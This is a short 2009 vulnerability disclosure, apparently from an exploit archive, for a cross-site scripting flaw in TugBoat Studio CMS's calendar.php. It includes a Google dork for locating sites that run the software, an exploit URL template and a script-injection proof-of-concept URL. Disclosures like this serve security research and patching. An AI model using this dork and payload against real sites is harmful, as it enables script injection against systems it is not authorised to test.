TugBoat Studio CMS suffers from a cross site scripting vulnerability.
472d58a7f3e1d71ef4a62d68424a5cf4dfad1b94e1add01708a812cf5cb52709
===========================================================================================
Title : Cross-site Scripting (XSS) Vulnerability
Software : TugBoat Studio CMS
Vendor : http://tugboatcms.com/
Date : 26 April 2009 (Indonesia)
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : http://c0li.blogspot.com/
===========================================================================================
[-] Google Dork
"Powered by TugBoat Studio"
[-] Vulnerable
calendar.php
[-] Exploit
http://[site]/[path]/calendar.php?year=[XSS]
[-] Demo
http://demo.tugboatcms.com/pages/calendar.php?year=<script>alert(123)</script>
===========================================================================================
Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
===========================================================================================